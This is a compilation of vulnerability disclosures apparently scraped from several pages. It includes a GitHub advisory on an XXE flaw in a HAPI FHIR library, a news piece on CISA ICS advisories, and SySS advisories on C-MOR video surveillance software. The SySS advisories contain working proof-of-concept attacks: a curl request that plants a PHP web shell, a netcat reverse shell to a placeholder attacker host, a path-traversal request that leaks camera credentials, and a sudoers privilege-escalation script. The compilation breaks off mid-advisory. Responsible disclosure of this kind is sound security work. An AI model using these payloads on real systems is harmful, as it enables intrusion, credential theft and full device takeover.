### Impact
XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag ( `<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>` could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML.

### Patches
This issue has been patched in release 6.3.23

### Workarounds
None.

### References
[MITRE CWE](https://cwe.mitre.org/data/definitions/611.html)
[OWASP XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#transformerfactory)


Skip to content

**Navigation Menu**

Sign in

**CVE-2024-45294**

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   GitHub Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   By size
    
    *   Enterprise
    *   Teams
    *   Startups
    
    By industry
    
    *   Healthcare
    *   Financial services
    *   Manufacturing
    
    By use case
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
*   Topics
    
    *   AI
    *   DevOps
    *   Security
    *   Software Development
    *   View all
    
    Explore
    
    *   Learning Pathways
    *   White papers, Ebooks, Webinars
    *   Customer Stories
    *   Partners
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   *   Enterprise platform
        
        AI-powered developer platform
        
    
    Available add-ons
    
    *   Advanced Security
        
        Enterprise-grade security features
        
    *   GitHub Copilot
        
        Enterprise-grade AI features
        
    *   Premium Support
        
        Enterprise-grade 24/7 support
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

We read every piece of feedback, and take your input very seriously.

Include my email address so I can be contacted

**Saved searches****Use saved searches to filter your results more quickly**

Sign in

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-45294

**XXE vulnerability in XSLT transforms in \`org.hl7.fhir.core\`**

High severity GitHub Reviewed Published Sep 6, 2024 in hapifhir/org.hl7.fhir.core • Updated Sep 6, 2024

Vulnerability details Dependabot alerts 0

**Package**

maven ca.uhn.hapi.fhir:org.hl7.fhir.dstu2016may (Maven)

**Affected versions**

< 6.3.23

**Patched versions**

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.dstu3 (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.r4 (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.r4b (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.r5 (Maven)

< 6.3.23

6.3.23

maven ca.uhn.hapi.fhir:org.hl7.fhir.utilities (Maven)

< 6.3.23

6.3.23

**Description**

**Impact**

XSLT transforms performed by various components are vulnerable to XML external entity injections. A processed XML file with a malicious DTD tag ( <!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]> could produce XML containing data from the host system. This impacts use cases where org.hl7.fhir.core is being used to within a host where external clients can submit XML.

**Patches**

This issue has been patched in release 6.3.23

**Workarounds**

None.

**References**

MITRE CWE  
OWASP XML External Entity Prevention Cheat Sheet

**References**

*   GHSA-59rq-22fm-x8q5
*   GHSA-6cr6-ph3p-f5rf
*   https://nvd.nist.gov/vuln/detail/CVE-2024-45294
*   https://github.com/HL7/fhir-ig-publisher/releases/tag/1.6.22
*   https://github.com/hapifhir/org.hl7.fhir.core/releases/tag/6.3.23

 dotasek published to hapifhir/org.hl7.fhir.core

Sep 6, 2024

Published by the National Vulnerability Database

Sep 6, 2024

Published to the GitHub Advisory Database

Sep 6, 2024

Reviewed

Sep 6, 2024

Last updated

Sep 6, 2024

**Severity**

High

8.6

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

Low

Privileges required

None

User interaction

None

Scope

Changed

Confidentiality

High

Integrity

None

Availability

None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

**Weaknesses**

CWE-611

**CVE ID**

CVE-2024-45294

**GHSA ID**

GHSA-6cr6-ph3p-f5rf

**Source code**

hapifhir/org.hl7.fhir.core

Loading Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-6cr6-ph3p-f5rf: XXE vulnerability in XSLT transforms in `org.hl7.fhir.core`

The vulnerabilities affect industrial control tech used across the healthcare and critical manufacturing sectors.

Source: PopTika via Shutterstock

This week the US Cybersecurity and Infrastructure Security Agency (CISA) warned about two new industrial control systems (ICS) vulnerabilities in products widely used in healthcare and critical manufacturing — sectors prone to attract cybercrime.

The vulnerabilities affect Baxter's Connex Health Portal and Mitsubishi Electric’s MELSEC line of programmable controllers. Both vendors have issued updates for the vulnerabilities and recommended mitigations that customers of the respective technologies can take to further mitigate risk.

**Baxter Connex Vulnerabilities**

CISA's advisory contained information on two vulnerabilities in Baxter's Connex Health Portal (formerly Hillrom and Welch Allyn) that it described as remotely exploitable and involving low attack complexity. One of the vulnerabilities, assigned as CVE-2024-6795, is a maximum severity (CVSS score of 10.0) SQL injection issue that an unauthenticated attacker can leverage to run arbitrary SQL queries on affected systems. CISA described the flaw as giving attackers the ability to access, modify, and delete sensitive data and take other admin level actions, including shutting down the database.

The other vulnerability in Baxter's Connex Health Portal, tracked as CVE-2024-6796, has to do with improper access control and has a CVSS severity rating of 8.2 on 10. The flaw gives attackers a way to potentially access sensitive patient and clinician information and to modify or delete some of the data. As with CVE-2024-6795, the improper access vulnerability in Baxter Connex Health Portal is also remotely exploitable, involves low attack complexity, and does not require the threat actor to have any special privileges.

Baxter has fixed the issues, but CISA has recommended that affected organizations also minimize network exposure for all control system devices and to make sure they are not accessible from the Internet. CISA also wants organizations to stick firewalls in front of control system networks and to use secure remote access methods such as VPNs where remote access is a requirement.

So far, there is no sign of exploit activity targeting either vulnerability, CISA said. But healthcare technologies have become a major target for cybercriminals in recent years. This year alone, there have been multiple incidents involving major healthcare players. Among the most notable of them was a ransomware attack on health insurance firm Change Healthcare earlier this year that knocked critical-claims-related services offline for days. Though Change Healthcare paid a $22 million ransom to the BlackCat ransomware group following the attack, the threat actor leaked sensitive health information on millions of Americans on the Dark Web anyway. In another incident, attackers — believed to be the Rhysida ransomware group — knocked systems offline at Chicago’s Lurie Children's Hospital and compromised records belonging to more than 790,000 patients.

Multiple factors have contributed to the healthcare sector becoming a major target for cybercriminals. These include the fact that healthcare organizations usually hold a lot of valuable data and are particularly vulnerable to any kind of operational disruptions and degradation in their ability to serve patients.

**Mitsubishi MELSEC Flaws**

Meanwhile CISA's advisory on Mitsubishi Electric's MELSEC programmable controllers for industrial automation and control applications have to do with vulnerabilities the vendor announced previously. One of the advisories involves a #denial of service of vulnerability that Mitsubishi first disclosed in 2020 (CVE-2020-5652) and has kept updating through the years as new issues related to the flaw have continued to crop up. The latest advisory adds more Mitsubishi MELSEC products to the list of affected technologies and provides new information on mitigating against the threat. The other vulnerability, identified as CVE-2022-33324, is also a denial-of-service issue, but one resulting from what CISA described as improper resource shutdown or release. Mitsubishi first disclosed the flaw in December 2022 and has kept updating its advisory with new information. The latest update, which adds new products to the list of affected technologies and provides new mitigation advice, is the company's third just this year for CVE-2022-33324.

Vulnerabilities in ICS and other Information technology products in the manufacturing sector are a particular concern for two reasons: More than 75% of manufacturing companies have unpatched high-severity vulnerabilities in their environment; and attacks against manufacturing companies have surged in recent years. A report that Armis released earlier this year showed a 165% increase in attacks on manufacturing companies in 2023, making it the second-most targeted sector after utilities.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

CISA Flags ICS Bugs in Baxter, Mitsubishi Products

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a command injection vulnerability.

Advisory ID:               SYSS-2024-030  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        OS Command Injection (CWE-78)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45179  
Authors of Advisory:       Matthias Deeg (SySS GmbH), Chris Beiter,  
                            Frederik Beimgraben,

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to insufficient input validation, the C-MOR web interface is  
vulnerable to OS command injection attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionality is vulnerable to OS command injection attacks, for  
example for generating new X.509 certificates or setting the time zone.

The OS command injection vulnerability in the script "generatesslreq.pml"  
can be exploited as a low-privileged authenticated user (see   
SYSS-2024-024[3])  
in order to execute commands in the context of the Linux user "www-data".

The OS command injection vulnerability in the script "settimezone.pml"  
requires an administrative user for the C-MOR web interface.

By also exploiting the privilege escalation vulnerability described in  
SYSS-2024-027[4], it is possible to execute commands on the C-MOR system  
with root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By sending the following HTTP POST request to the script  
"generatesslreq.pml", the injected OS command via the parameter  
"city" is executed as Linux user "www-data".

In this sample attack vector, a simple PHP web shell is created in  
the backup directory within the web server's webroot:

POST /generatesslreq.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 152  
Connection: close

countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss

This PoC attack can be performed using the following curl command:

curl -X POST -d "countrycode=de&state=state&city=city'|echo '<?php echo   
system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php   
#&organization=org&servername=syss" --user "<USERNAME>:<PASSWORD>"   
--ciphers "DEFAULT:!DH" https://<HOST>/generatesslreq.pml

The uploaded web shell can be used via the following URL:

https://<HOST>/backup/web shell.php?cmd=<COMMAND>

In version 6.00PL01, an OS command injection was, for instance, possible  
using the following attack vector:

curl -X POST \  
   -d   
'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26'   
\  
   --user "<USERNAME>:<PASSWORD>" \  
   --insecure \  
   --ciphers 'DEFAULT:!DH' \  
   https://<HOST>/en/setdatetime.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the   
newly  
released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-030

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt  
[3] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[4] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[5] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Command Injection

C-MOR Video Surveillance version 5.2401 makes use of unmaintained vulnerability third-party components.

Advisory ID:               SYSS-2024-029  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Dependency on Vulnerable Third-Party   
Component (CWE-1395)  
                            Use of Unmaintained Third Party Components   
(CWE-1104)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2017-9798, CVE-2017-3167, and more  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

The C-MOR system uses several outdated third-party software components  
with known security vulnerabilities.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that the C-MOR system depends  
on several outdated third-party software components with known security  
vulnerabilities, for instance an old Linux kernel, Apache HTTP Server  
2.2.16, PHP 5.3.3, or Python 2.6.

Some of the used software components have also reached their end of life  
and are not supported anymore by a maintainer.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following excerpt of the "dpkg-query" output illustrates some outdated  
third-party software components used on the C-MOR system:

$ sudo dpkg-query -l  
(...)  
ii  apache2                             2.2.16-6+squeeze10   
Apache HTTP Server metapackage  
ii  apache2-mpm-prefork                 2.2.16-6+squeeze10   
Apache HTTP Server - traditional non-threaded model  
ii  apache2-utils                       2.2.16-6+squeeze10   
utility programs for webservers  
ii  apache2.2-bin                       2.2.16-6+squeeze10   
Apache HTTP Server common binary files  
ii  apache2.2-common                    2.2.16-6+squeeze10   
Apache HTTP Server common files  
(...)  
ii  libapache2-mod-php5                 5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (Apache 2 module)  
(...)  
ii  libssl0.9.8                         0.9.8o-4squeeze14            SSL   
shared libraries  
(...)  
ii  linux-image-4.7.8                   c-mor-v5-00   
Linux kernel binary image for version 4.7.8  
(...)  
ii  php5                                5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (metapackage)  
rc  php5-cgi                            5.3.3-7+squeeze14   
server-side, HTML-embedded scripting language (CGI binary)  
ii  php5-cli                            5.3.3-7+squeeze14   
command-line interpreter for the php5 scripting language  
ii  php5-common                         5.3.3-7+squeeze14   
Common files for packages built from the php5 source  
ii  php5-gd                             5.3.3-7+squeeze14            GD   
module for php5  
ii  php5-mysql                          5.3.3-7+squeeze14   
MySQL module for php5  
ii  php5-suhosin                        0.9.32.1-1   
advanced protection module for php5  
(...)  
ii  python2.6                           2.6.6-8+b1                   An   
interactive high-level object-oriented language (version 2.6)  
ii  python2.6-minimal                   2.6.6-8+b1                   A   
minimal subset of the Python language (version 2.6)  
(...)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-029

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-029.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Insecure Third-Party Components

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 stores sensitive information, such as credentials, in clear text.

Advisory ID:               SYSS-2024-028  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Cleartext Storage of Sensitive Information   
(CWE-312)  
Risk Level:                Medium  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45175  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Sensitive information is stored in cleartext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system, it was found that sensitive information,  
for example login credentials of cameras, is stored in clear text.

Thus, an attacker with file system access, for example exploiting a path  
traversal attack (see SYSS-2024-025[3]), has access to the login data of  
all configured cameras or the configured FTP server.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By exploiting the path traversal attack in the backup download script  
"download-bkf.pml", login credentials of cameras can be retrieved, as  
the following HTTP request and the corresponding response demonstrate:

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 24  
Connection: close

bkf=../../../etc/ip.cam1

HTTP/1.1 200 OK  
(...)

192.168.1.11  
80  
<USERNAME>  
<PASSWORD>

This PoC attack can be performed using the following curl command:

curl -X POST -d 'bkf=../../../etc/ip.cam1' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
192.168.1.11  
80  
<USERNAME>  
<PASSWORD>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-028

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-028.txt  
[3] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, and Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Information Disclosure / Cleartext Secret

C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from an improper privilege management vulnerability that can allows for privilege escalation.

Advisory ID:               SYSS-2024-027  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Improper Privilege Management (CWE-269)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45173  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper privilege management concerning sudo privileges, C-MOR  
is vulnerable to a privilege escalation attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR system with shell access (see SYSS-2024-026[3]),  
it was found that the Linux user "www-data" running the C-MOR web  
interface can execute some OS commands as root via sudo without having  
to enter the root password.

These commands, for example, include "cp", "chown", and "chmod", which  
enable an attacker to modify the system's sudoer file in order to  
execute all commands with root privileges.

Thus, it is possible to escalate the limited privileges of the user  
"www-data" to root privileges.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

For demonstrating a privilege escalation attack with shell access as  
the user "www-data", the following shell script was uploaded to the  
C-MOR system and executed:

$ cat privesc.sh  
sudo cp /etc/sudoers /home/cam  
sudo chown www-data /home/cam/sudoers  
sudo chmod 777 /home/cam/sudoers  
echo 'www-data        ALL = (ALL) NOPASSWD: ALL' >> /home/cam/sudoers  
sudo chmod 440 /home/cam/sudoers  
sudo chown root /home/cam/sudoers  
sudo cp /home/cam/sudoers /etc/sudoers  
sudo rm /home/cam/sudoers

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-027

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt  
[3] SySS Security Advisory SYSS-2024-026

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Privilege Escalation

C-MOR Video Surveillance version 5.2401 suffers from a remote shell upload vulnerability.

Advisory ID:               SYSS-2024-026  
